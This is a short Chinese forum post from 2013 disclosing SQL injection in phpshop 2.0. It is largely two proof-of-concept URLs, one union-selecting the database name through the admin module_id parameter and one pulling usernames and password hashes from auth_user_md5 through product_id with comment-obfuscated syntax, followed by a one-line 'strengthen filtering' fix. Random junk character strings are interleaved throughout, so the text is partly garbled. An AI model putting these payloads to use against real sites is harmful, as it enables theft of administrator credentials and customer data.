标题 : phpshop 2.0 SQL Injection Vulnerability! ^5 o# y2 ?1 b
; M! @, r3 q- V' t作者 : By onestree
$ R& i6 @) K! x' c$ [# [9 V下载地址 : http://code.google.com/p/phpshop/downloads/list
: ]( r: z, n7 {测试地址: windows 7 / ubuntu
! D5 c5 E4 B. V: D! E , c7 m# R, F. L8 p9 q; v' }
$ @2 \6 d0 }/ Q/ A5 `
SQLi p0c:
$ g" C( u# Y9 J0 v( d2 D* a8 _ } 9 J/ s) h4 a! f. D; R6 |
==================
# E( i+ R! a" T6 u* p0 t 6 b1 V) b5 K/ h: N
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
4 ]- q: `" {/ r) J" Junion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- c. B1 w0 U! y* U
; u7 Y5 x c, R: d& A9 O2 Bhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--' s& s o0 Y2 V' X
6 [! I2 i# g& ?修复:9 C: V. l3 t: u+ n0 L, g! z+ R
加强过滤
- W# v$ C/ o& N+ k
8 w1 w1 H# E. w7 R( g
' t" D6 @; r1 v5 F# ^ |
发表于 2013-1-18 18:24:10
收藏
支持
反对